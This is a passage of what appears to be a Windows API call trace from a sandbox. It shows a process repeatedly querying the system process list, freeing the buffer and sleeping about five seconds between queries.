returned 0x0 [0249.075] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.075] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.076] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.076] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.079] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.079] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.081] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.081] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.082] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.082] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.082] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.085] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.086] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.087] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.088] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.088] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.088] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.091] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.092] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.094] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.094] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.095] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.095] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.095] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.098] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.098] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.100] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.100] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.100] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.101] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.101] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.105] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.106] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.107] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.108] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.108] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.108] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.112] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.114] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.114] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.115] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.115] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.115] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.119] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.119] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.121] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.121] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.122] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.122] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.122] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.126] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.126] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.128] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.128] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.129] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.129] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.129] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.132] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.133] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.135] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.135] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.139] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.139] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.141] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.141] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.142] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.142] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.142] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.146] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.147] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.149] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.149] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.154] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.155] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.156] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.156] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.157] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.157] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.160] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.161] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.162] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.162] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.163] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.163] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.163] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.167] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.167] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.185] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.186] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.186] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.187] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.187] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.190] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.191] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.193] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.193] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.193] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.194] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.194] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.197] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.198] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.199] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.199] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.200] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.200] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.200] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.203] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.204] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.205] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.205] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.206] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.206] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.206] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.209] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.210] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.211] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.212] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.212] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.212] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.216] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.216] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.218] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.218] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.219] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.219] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.219] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.222] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.223] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.224] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.224] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.225] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.225] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.225] NtQuerySystemInformation (in: 